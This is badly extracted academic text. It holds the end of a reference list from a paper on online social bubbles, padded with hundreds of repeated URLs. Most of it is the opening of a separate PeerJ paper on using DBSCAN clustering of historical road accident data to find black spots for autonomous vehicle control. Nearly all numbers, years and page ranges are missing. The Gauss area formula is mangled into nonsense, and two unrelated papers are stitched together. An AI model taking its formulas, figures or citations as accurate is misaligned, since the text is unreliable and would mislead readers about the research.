http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://arxiv.org/abs/ . http://dx.doi.org/ . /a http://dx.doi.org/ . /mnsc. . http://dx.doi.org/ . / x http://arxiv.org/abs/ . http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ http://dx.doi.org/ . /peerj-cs. mckenzie cr. . hypothesis testing and evaluation. in: koehler dj, harvey n, eds. handbook of judgment and decision making. oxford: blackwell, – , chapter . meiss mr, menczer f, fortunato s, flammini a, vespignani a. . ranking web sites with real user traffic. in: proceedings of the international conference on web search and data mining. new york: acm, – . mervis j. . an internet research project draws conservative ire. science ( ): – doi . /science. . . . mobasher b, cooley r, srivastava j. . automatic personalization based on web usage mining. communications of the acm ( ): – doi . / . . munson sa, resnick p. . presenting diverse political opinions: how and how much. in: proceedings of the sigchi conference on human factors in computing systems. new york: acm, – . nickerson rs. . confirmation bias: a ubiquitous phenomenon in many guises. review of general psychology ( ): – doi . / - . . . . nyhan b, reifler j. . when corrections fail: the persistence of political misperceptions. political behavior ( ): – doi . /s - - - . pariser e. . the filter bubble: how the new personalized web is changing what we read and how we think. london: penguin. ricci f, rokach l, shapira b, kantor pb. . recommender systems handbook. new york: springer. sen a. . on economic inequality. oxford: oxford university press. shannon ce. . a mathematical theory of communication. the bell system technical journal ( ): – doi . /j. - . .tb .x. silverman c. . the backfire effect. available at http://www.cjr.org/behind the news/the backfire effect.php?page=all (accessed april ). stanovich ke, west rf, toplak me. . myside bias, rational thinking, and intelligence. current directions in psychological science ( ): – doi . / . sunstein cr. . the law of group polarization. journal of political philosophy ( ): – doi . / - . . sunstein cr. . republic.com . . princeton: princeton university press. nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /science. . . http://dx.doi.org/ . / . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j. - . .tb .x http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all http://dx.doi.org/ . / http://dx.doi.org/ . / - . http://dx.doi.org/ . /peerj-cs. measuring online social bubbles introduction methods click dataset news targets in the click dataset diversity measure and relationship to traffic auxiliary datasets results discussion conclusion acknowledgement references analysis of historical road accident data supporting autonomous vehicle control strategies analysis of historical road accident data supporting autonomous vehicle control strategies sándor szénási , faculty of economics and informatics, j. selye university, komárno, slovakia john von neumann faculty of informatics, Óbuda university, budapest, hungary abstract it is expected that most accidents occurring due to human mistakes will be eliminated by autonomous vehicles. their control is based on real-time data obtained from the various sensors, processed by sophisticated algorithms and the operation of actuators. however, it is worth noting that this process flow cannot handle unexpected accident situations like a child running out in front of the vehicle or an unexpectedly slippery road surface. a comprehensive analysis of historical accident data can help to forecast these situations. for example, it is possible to localize areas of the public road network, where the number of accidents related to careless pedestrians or bad road surface conditions is significantly higher than expected. this information can help the control of the autonomous vehicle to prepare for dangerous situations long before the real-time sensors provide any related information. this manuscript presents a data-mining method working on the already existing road accident database records to find the black spots of the road network. as a next step, a further statistical approach is used to find the significant risk factors of these zones, which result can be built into the controlling strategy of self- driven cars to prepare them for these situations to decrease the probability of the potential further incidents. the evaluation part of this paper shows that the robustness of the proposed method is similar to the already existing black spot searching algorithms. however, it provides additional information about the main accident patterns. subjects autonomous systems, data mining and machine learning, spatial and geographic information systems keywords data mining, dbscan, road accident, statistics, autonomous vehicle, road safety introduction human drivers have many disadvantages compared to autonomous vehicles (slower reaction time, inattentiveness, variable physical condition) (kertesz & felde, ). nevertheless, they can often perform better (chatterjee et al., ) in some unexpected situations like a child running out in front of the vehicle. because beyond the information gained in real-time, they may have specific knowledge about a given location (linked to the previous example, the human driver may know that there is a playground without a fence near the road; therefore, the appearance of a child is not unexpected). drivers also have some incomplete but useful historical knowledge about accidents and they can build this information into their driving behavior. if they know that there were several how to cite this article szénási s. . analysis of historical road accident data supporting autonomous vehicle control strategies. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted january published february corresponding author sándor szénási, szenasi.sandor@nik.uni-obuda.hu academic editor chintan amrit additional information and declarations can be found on page doi . /peerj-cs. copyright szénási distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:szenasi.�sandor@�nik.�uni-obuda.�hu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ pedestrian collisions somewhere, they will decrease the speed and try to be more attentive without triggering real-time signals. thanks to this behavior, they can prepare for and avoid some types of accidents, which were not possible without this historical data. another example might be a road section, which is usually extremely slippery on rainy days. real-time sensors can detect the element of slipping when it is too late to avoid the consequences. some historical accident data can help to prepare the car for these unexpected situations. we propose the following consecutive steps to integrate historical data into the control algorithm for autonomous devices: . localize accident black spots in an already existing accident database, using statistical or data-mining methods; . determine the common reasons for these accidents with statistical analysis or pattern matching; . specify the necessary preventive steps to decrease the probability of further accidents. this article mainly focuses on the first two steps because the third one largely depends on the limits and equipment of the self-driven car. for example, in the case of dangerous areas is it possible to increase the power of lights to make the car more visible? or in the case of large chance of pedestrian accidents, is it possible to increase the volume of the artificial engine sound to avoid careless road crossing? can the car change the suspension settings to prepare for potentially dangerous road sections? the scope of this paper is the development of the theoretical background to support these preliminary protection activities. the appropriate preliminary actions may significantly decrease the number and severity of road accidents. for example, carsten & tate ( ) present a model for the relationship between changes in vehicle speed and the number of occurred accidents. it is visible from this model (based on the national injury database of great britain to predict the effects of speed on road accidents) that for each km/h change in mean speed, the best- estimated change of accident risk is %. accordingly, it is worth making assumptions about the dangerous areas and adapting the control of the autonomous cars to these predictions. background black spot identification black spot management (identification, analysis, and treatment of black spots in the public road network) is one of the most important tasks of road safety engineers. the identification of these extremely hazardous sections is the first step to prevent further accidents or to decrease the seriousness of these. it is a heavily researched area, and there are several theoretical methods for this purpose. however it has a long tradition in traffic engineering; interestingly, there is not any generally accepted definition of road accident black spots (also known as hot spots), szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the official definition varies by country. it follows that the method used to find these hazardous locations also varies by country. for example, by the definition of the hungarian government, outside built-up area black spots are defined as road sections no longer than meters where the number of accidents during the last three years is at least . according to this, road safety engineers use simple threshold-based methods (for example, the traditional sliding window technique) to find these areas. switzerland uses a significantly different definition as black spots are sections of the road network (or intersections) where the number of accidents is “well above” the number of accidents at comparable sites. the key difference is the term “comparable sites” because these advanced comparative methods do not try to classify all road segments by itself but try to compare to similar areas. there are some general attributes of accident black spots to overcome the conceptual confusion. these are usually well-defined sections or intersections of the public road network, where road accidents are historically concentrated (elvik, ; delorme & lassarre, ; murray, white & ison, ; montella et al., ; hegyi, borsos & koren, ). nowadays, road accidents are monitored by the governments and all data about accidents are stored in large, reliable and partially public databases (without any personal information about the participants). much data about the road network is also available (road layout, speed limits, tables, etc.). as a result, road safety engineers can use several procedures from various fields (statistics, data mining, pattern recognition) to localize accident black spots in these databases. it is a common assumption that the number of accidents is significantly higher at these locations compared to other sections of the road network. however, this alone is neither a necessary nor sufficient condition. the variation of the average yearly accident count of road sections is relatively high compared to the number of accidents. because of this, the regression to the mean effect can distort the historical data. a given section with more accidents than average is not necessarily an accident black spot. the converse is also true, as there may be true black spots with relatively few accidents for a given year. however, this deficiency is already theoretically proven as most black spot identification methods are based on the accident numbers of the last few years, simply because this is the best place to start a detailed analysis. nevertheless, it is always worth keeping in mind that these locations are just black spot candidates, but it needs further examination to make the right decision concerning them. the best way to do this is via a detailed scene investigation, but it is very expensive and time-consuming. another theoretical approach can be the analysis of accident data to find some irregular patterns and identify one or more risk factors causing these accidents. without these, it is possible that the higher frequency of accidents is purely coincidental at a given location and time. to localize potential accident black spots, the most traditional procedure is the sliding window method (lee & lee, ; elvik, ; geurts et al., ). the input parameters of szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the process are the section length and a threshold value. the method is based on the following: . divide the selected road into small uniform sized sections; . count the number of accidents that have occurred in the last few years for each section; . flag the segments where this number is higher than a given threshold as potential black spots. there are many variants of the proposed traditional sliding window method (anderson, ; szénási & jankó, ). a potential alternative is to use variable window length. one of its advantages is that it is unnecessary to set the appropriate parameter, but sufficient to give a minimal and maximal value. the method can try several window lengths to find the largest black spots possible. due to this modification, it can find small local black spots and larger ones too. the traditional sliding window method uses non- overlapping segments, but it is also possible to slide the window with smaller steps than the window size. this leads to a more sensitive method, which can find more black spot candidates. however, it is also necessary to manage the overlapping black spots (considering these as one big cluster, or multiple distinct ones). it is worth mentioning that the method has some additional advantages: it has very low computational demand (compared to the alternatives) and is based only on the road accident database. the sliding window method is one of the first widely used procedures; therefore, it is based on the traditional road number + section number positioning system (for example, the accident location is road , + kilometer+meter). this traditional positioning system was the only real alternative in the past. however, in the last decades, the spreading of gps technology makes it possible to collect spatial coordinates of accidents. this step has several benefits (faster and more accurate localization) but also requires the rethinking of the already existing methods. it is possible to extend the sliding window method to a two-dimensional procedure, but it is not widely used. it is better to seek out better and more applicable methods fitting to the spatial systems given by the gps coordinates. from this field, kernel density estimation (kde) methods are one of the most popular spatial data analysis techniques (bíl, andrášik & janoška, ; flahaut et al., ; anderson, ; yu et al., ; toran & moridpour, ). these have been employed in many research projects to analyze road accidents. kde methods have the advantages of simple implementation and easy understanding. these also have the benefit to naturally handle the noise of the data (caused by inaccuracy of gps devices). in general, kde is used as an estimation of the probability random function of a random variable. from the safety experts’ point of view, the result of the kde method is the accident density estimation at a given reference point. the procedure has several parameters, like the search radius distance from the reference point (bandwidth or kernel size) and the kernel function. several researchers recommend the use of empirical bayesian methods combining the benefits of the predicted and historical accident frequencies. these models usually analyze the distributions of the already existing historical data from several aspects, and szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ give predictions about the expected accident state. in the empirical bayesian method, the existing historical accident count and the expected accident count predicted by the model are added using different weights (ghadi & török, ). because of this, this process requires an accurate accident prediction model. another group of already available methods is based on clustering techniques. these procedures are from the field of data mining, where clustering is one of the widely used unsupervised learning methods. in this context, a cluster is a group of items, which are similar to each other and differ from items outside the cluster. accidents with similar attributes (where properties can be the location and/or another risk factor(s)) can be considered as one cluster, using this concept in the field of black spot searching. most studies use the basic k-means clustering method (mauro, de luca & dell’acqua, ), but there are also some fuzzy-based c-means solutions. as already mentioned, the results of the proposed methods are just a set of black spot candidates. it needs further analysis to make a final, valid decision as to whether it is a real accident black spot or not. furthermore, whether or not it requires any actions. this is the point where our research turns away from traditional road safety management work (identification and elimination of black spots). based on the collected clusters, road safety engineers must select the black spot candidates having the largest safety potential, which is based on the prediction of the effect of the best available preventive action (cost of the local improvement activity compared to the expected befits in the number and severity of further accidents). from the perspective of autonomous car control, the role of this safety potential is essential. the self-driven car has no options to solve road safety problems. the only important information is the existence of accident black spots and the potential safety mechanisms, which may help to avoid further crashes. as a second difference, from the road safety engineers’ point of view, it is not necessary that the accidents of a given black spot have common characteristics. the hot spot definition of this paper assumes that accidents of a given cluster have similar attributes because this pattern will be the basis of the preventive actions. the localization of accident black spot candidates is a heavily researched area and there are several fully-automated methods to find these. nevertheless, the further automatic pattern analysis of these is not as well developed. this phase usually needs a great deal of manual work by human road safety experts (they must travel to the scene and investigate the environment to support their decisions about recommended actions). however, this process is supportable by some general rules but is mostly done manually using the pattern matching capability of the human mind. to fully automate it, it is necessary to make this method applicable to self-driven cars. according to this objective, this paper focuses on the help for autonomous vehicles to take the appropriate preventive actions to avoid accidents: � localize black spot candidates using historical accident database; � make assumptions about the common risk factors and patterns of these accidents; � according to these preliminary results, the autonomous device will know where the dangerous areas are and what preventive actions to take. szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ automated accident prevention autonomous vehicles will have several ways to avoid accidents and, therefore, is a hot, widely researched topic. nevertheless, most papers deal with options existing only in the far future when autonomous devices will be a part of a densely connected network without any human interferences. real-world implementations are far from this point, but some technologies already exist, although they are not closely related to autonomous vehicles. currently, implemented accident prevention systems are built into traditional cars as braking assistants, etc. however, it is worth considering these because such methods will be the predecessor of the future techniques applicable to self-driven vehicles. the two main classes of accident prevention systems are passive and active methods. passive systems send notifications to the driver about their warnings but do not perform any active operations. on the contrary, active methods have the right to perform interventions (braking, steering, etc.) to avoid accidents. it seems obvious that these prevention systems have a large positive impact on accident prevention, and it has already been proven by jermakian ( ) that passive methods have significant benefits. there are more than one million vehicle crashes prevented in the usa each year. as harpen proved (harper, hendrickson & samaras, ), the cost-benefit ratio of these systems is also positive. brake assist systems are one of the most researched active systems, where the potential benefits are the lower risk of injury, and the less serious injuries of the pedestrians (rosén et al., ). current forward-looking crash avoidance systems are usually continuously scanning the space in front of the vehicle using various devices (camera, radar, lidar, etc.). if any of these detects an unexpected vehicle or pedestrian, the brake assistant system takes the appropriate (preliminary) actions, which can be the enforcement of the braking system or direct autonomous emergency braking. bálint, fagerlind & kullgren ( ) presented very promising results with a test-based methodology for the assessment of braking and pre-crash warning systems. these typically are only using the real-time information given by the vehicle sensors without any knowledge extracted from historical accident data. run-time crash prediction models are also related to the topic of this paper. hossain et al. ( ) presented a comprehensive comparison and review of existing real-time crash prediction models. the basic assumption of these systems is that the probability of a crash situation within a short time window is predictable by the current environmental parameters measured by the sensors. therefore, most of the already existing methods use only the acquired sensor data to make real-time decisions about potential crash situations. according to this assumption, authors do not use the already existing accident databases as an input to fine-tune the system’s predictions. the work of lenard, badea-romero & danton ( ) is closer to the research presented in this paper. they analyzed the common accident scenarios to support the development of autonomous emergency braking protocols. based on the hierarchical ascending method in two british accident databases filtered by some previously defined conditions (they use only the urban pedestrian accidents that occurred in daylight and with fine szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ weather conditions), attributes of the most common accident scenarios were presented. this paper defines the major accident scenarios and classifies all existing pedestrian accidents into one of these categories. the results of this research would be useful in the training phase of a self-driven vehicle to introduce all possible scenarios to the algorithm. the objective of nitsche et al. ( ) is similar, which proposes a novel data analysis method to detect pre-crash situations at various (t- and four-legged) intersections. the purpose of this work is also to support the safety tests of autonomous devices. they clustered accident data into several distinct partitions with the well-known k-medoids procedure. based on these clusters, an association rules algorithm was applied to each cluster to specify the driving scenarios. the input was a crash database from the uk (containing one thousand junction crashes). the result of the paper contains thirteen crash clusters, describing the main pre-accident situations. materials and methods black spot candidate localization density-based spatial clustering of applications with noise for the black spot candidate localization step, the density-based spatial clustering of applications with noise (dbscan) algorithm was used. it is not widely used in the field of road safety engineering; however, it is one of the most efficient density-based clustering methods from the field of data mining. the main objective of density-based clustering tasks is the following: the density of elements within a cluster must be significantly higher than between separate clusters. this principle distinguishes the two distinct classes of elements: items inside a cluster and the outliers (elements outside of any cluster). according to the road safety task, elements are the accidents in the public road network. these are identified by spatial gps coordinates and have several additional attributes (time, accident nature, etc.). the general dbscan method needs a definition for distance calculation between two elements. in the case of road accidents, the euclidean distance between the two gps coordinates was used (black spots are usually spread over a small area. therefore, it is a good estimation of the real road network distances). the dbscan method requires two additional parameters: � ε: a radius type variable (meters); � minpts: the lower limit for the number of accidents in a cluster (accidents). the main definitions of the dbscan algorithm are as follows: � ε environment of a given x element is the space within the ε radius of the x element; � x is an internal element if the ε environment of the given x contains at least minpts elements (including x); � x is directly densely reachable from y means that x is in the ε environment of y which is an internal element; � x is densely reachable from y if it is accessible through a chain of directly densely reachable elements from y; szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � all points not densely reachable from an internal element are the outliers; � if x is an internal element then it forms a cluster together with all densely reachable elements from x. the objective of the process is to find clusters of accidents in the public road network in which all elements are densely connected, and no further expansion is possible. the steps to achieve this are as follows: . select one internal element from the accident database as the starting point. this will be the first point of the cluster. . extend the cluster with all directly densely reachable elements from any point of the cluster recursively. . if it is not possible to extend the cluster with additional points, the cluster can be considered as final (it contains all the densely reachable items from the starting point). if this cluster meets the prerequisites for a black spot candidate, it is stored in the result set. . repeat steps – for all internal elements of the database. the result of the presented procedure is a set of black spot candidates. the prerequisites of step can be one or more of the following: � the number of accidents should be more than a given threshold. � the accident density of the given area should be more than a given threshold. the proposed method has several advantages over the traditional methods. unlike the sliding window algorithm, which analyzes only the accidents of a given road section, the dbscan is a spatial algorithm managing all accidents of the database together. this difference would be substantial in the case of junctions where the accidents of the same junction were assigned to different road numbers. this can be especially critical in the case of built-up areas and traffic roundabouts, where the number of connected roads is high. determination of accident density one of the benefits of the traditional sliding window method is that it is easy to interpret for human experts. the number of accidents in a given road section is a very informative number. it is also easy to calculate some derived values, like the accident density, which is the number of accidents divided by the length of the road section. this divisor is often extended with the traffic rate or the time period length values. in the case of spatial black spot localization techniques, the definition of road accident density is more complex. these methods are not based on road sections, so division by the section length is not applicable. it is necessary to calculate the area of the black spot to use it as a divisor somehow. this article proposes a novel method to calculate the area of the region spanned by the black spot accidents. it finds the smallest boundary convex polygon containing all szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ accidents of a given cluster. the density of the black spot will be the number of accidents divided by the area of this polygon. the area is calculated by the gauss’ area formula eq. ( ). aðcÞ¼ pn� i¼ xiyiþ þxny � pn� i¼ xiþ yi �x yn �� �� ¼ x y þx y þ…þxn� yn þxny �x y �x y �…�xnyn� �x ynj j ( ) where � a(c): the area of the c polygon (cluster); � n: the number of vertices of the polygon; � (xi, yi): the two-dimensional coordinates of the i-th vertex of the c polygon (where i ∈ { , , …, n}). if the number of accidents is less than three, the proposed area concept is not applicable. however, clusters with one or two accidents are usually not considered as black spot candidates. therefore, this is not a real limitation. in the case of clusters with more than two accidents, the accident rate is calculated as eq. ( ). rðcÞ¼ jcj aðcÞ ( ) where � ρ(c): the accident density of the c cluster; � |c|: the number of accidents in the c cluster. the formula requires the sequence of corner coordinates of the polygon in a given order (in this case, a clockwise direction). the traditional dbscan algorithm continuously builds the polygon from a starting point and the result is a set of accidents. consequently, there should be an additional step to give the corner points in the appropriate order. it is possible to do this after the dbscan finishes, but it is also possible to extend the dbscan method with the following steps: � in the case of the first (p ) and second (p ) items, the concept of “polygon” cannot be interpreted. hence, these are automatically marked as further corner points of the polygon. � with the third point (p ), the items already form a polygon. the p point must be on the right side of the vector p p �� , which can be checked using a scalar multiplication to ensure the clockwise direction requested by the gauss formula. if this is not the case, it is necessary to change the order of p and p . after that step, p , p and p will be the corner points of the polygon in a clockwise direction. � for every additional point (p , p , . . ., pn), it must be checked that the additional point is inside the actual boundary convex polygon or not. it is possible to check that the new szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ point (pnew) is on the right side of the boundary vector or not. if it is true for each vectors, the point must be inside the polygon (or in the border). therefore, it is not necessary to modify the shape. if the new point is on the left side of any boundary vectors, then it is outside the boundary convex polygon. there must be a sequence of one or more consecutive vectors breaking the rule. let k and l be the first and last vectors of this sequence. it is possible to substitute the pk� ; pk; pkþ ; . . . ; pl� ; pl; plþ part of the boundary vector list with pk − , pnew, pl + . because of the convexity of the original polygon, the pk − , pnew, pl + triangle contains all the pk; pkþ ; . . . ; pl� ; pl points, and the transformation also ensures the convexity of the new polygon and the clockwise direction of the corner points. three figures about this process have been attached to the article in the supplemental file “dbscan images”. it is possible to calculate the black spot area and the accident density of a given cluster using the previous method. analysis of black spot candidates the result of the various black spot localization algorithms (sliding window, clustering, etc.) is a list of potential hot spots. however, having some accidents in a cluster does not mean that the 